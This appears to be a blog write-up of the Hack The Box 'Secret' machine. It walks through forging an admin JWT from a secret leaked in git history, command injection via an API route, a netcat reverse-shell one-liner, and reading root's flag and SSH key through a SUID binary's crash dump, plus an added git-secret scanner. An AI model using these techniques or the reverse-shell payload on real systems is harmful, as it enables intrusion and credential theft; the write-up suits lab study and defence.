[ Hack The Box ] Secret

Ghi
4 min read, Mar 26, 2022

Let’s start with nmap

This is the web page

Clicking one of the boxes below takes you to another page that explains how to use the API.

  • How to register:
  • After registering, you can log in and receive an auth-token:
  • If you are admin, you can use this auth-token to access the private route.

Let’s put it into action! I used curl for all of this.

Register

curl -X POST -H 'Content-Type: application/json' http://10.10.11.120/api/user/register -d '{ "name" : "your-name", "email" : "your@email.com", "password" : "your-password" }'

Log in

curl -X POST -H 'Content-Type: application/json' http://10.10.11.120/api/user/login -d '{ "email" : "your@email.com", "password" : "your-password" }'

Now we have our auth-token. Let’s paste it into the JWT Debugger. It seems we need a secret to verify the token’s signature:

Back on the web page from the beginning, scroll down and you will see a button to download the source code.

After reading all the files, I found that the file named .env contains a secret token:

Then I noticed that this piece of code lets us execute commands if we are theadmin; as we read before, theadmin can access the private route:

…/routes/private.js

There is also a .git folder. You can view the history of changes to the source code by typing the command git log.

Running git diff HEAD~2, we can see the token in the change:
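The same history check from the defender’s side, as an added example that is not part of the original writeup: a small scanner that walks git log -p output and flags any added or removed line assigning a credential-looking key, so a .env secret that was "removed" in a later commit is still caught before the repository is published. SAMPLE_LOG is constructed input, not the box’s real history.

```python
import re

# Constructed sample of `git log -p` output (not the box's real history): the newer
# commit replaces the long secret with a placeholder, but the original value is
# still recoverable from the older commit, which is what git diff HEAD~2 exposed.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
diff --git a/.env b/.env
--- a/.env
+++ b/.env
@@ -1,2 +1,2 @@
 PORT = 3000
-TOKEN_SECRET = CONSTRUCTED_EXAMPLE_SECRET_0123456789abcdef
+TOKEN_SECRET = secret

commit 2222222222222222222222222222222222222222
diff --git a/.env b/.env
--- /dev/null
+++ b/.env
@@ -0,0 +1,2 @@
+PORT = 3000
+TOKEN_SECRET = CONSTRUCTED_EXAMPLE_SECRET_0123456789abcdef
"""

# An added (+) or removed (-) line assigning a key whose name suggests a credential.
SECRET_ASSIGN = re.compile(r"^([+-])\s*([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|KEY)[A-Z0-9_]*)\s*=\s*(.+)$")
MIN_VALUE_LEN = 16  # ignore trivial placeholders such as "secret"


def find_leaked_secrets(log_text):
    """Return (short_commit, sign, path, key) for every secret-looking assignment
    added or removed anywhere in the history dump. Values are never returned."""
    commit = path = None
    findings = []
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("+++ "):
            path = line[4:]  # target path of the hunks that follow
            path = path[2:] if path.startswith("b/") else path  # strip git's "b/" prefix
        elif line.startswith("--- "):
            continue  # source path header, not a removed line
        elif commit and path:
            m = SECRET_ASSIGN.match(line)
            if m and len(m.group(3).strip().strip("'\"")) >= MIN_VALUE_LEN:
                findings.append((commit, m.group(1), path, m.group(2)))
    return findings
```

Run it against the real output of git log -p --all in CI; a non-empty result means the secret must be rotated, since rewriting history does not un-leak a value that was already pushed.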

So, we log in with the account we created earlier to get a token. Then we put the token into the JWT Debugger together with the TOKEN_SECRET we just found. After that, we can finally change the name claim in the JWT to “theadmin”.

Let’s try this out!

Yay

Now we can execute commands! Let’s create a reverse shell.

You can take one of the payloads from here, change the IP and port, then URL-encode it. The one I used is: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

Now we can get the user flag. We will need to upgrade the shell; you can follow this tutorial for that.

In /opt, we can find a binary with the SUID bit set.

Run that binary and give /root/root.txt as input. Press Ctrl+Z to pause the process. Then kill the process using the PID we can find by running ps. The process will crash and we can get more information from /var/crash.

“The apport-unpack command will output human readable files into a directory provided a .crash file and the name of a directory.”

After executing the command above, scroll down a little and you will find the contents of the root flag. You can also obtain root’s SSH key by replacing /root/root.txt with /root/.ssh/id_rsa in the previous step, and use it to log in to the machine as root.
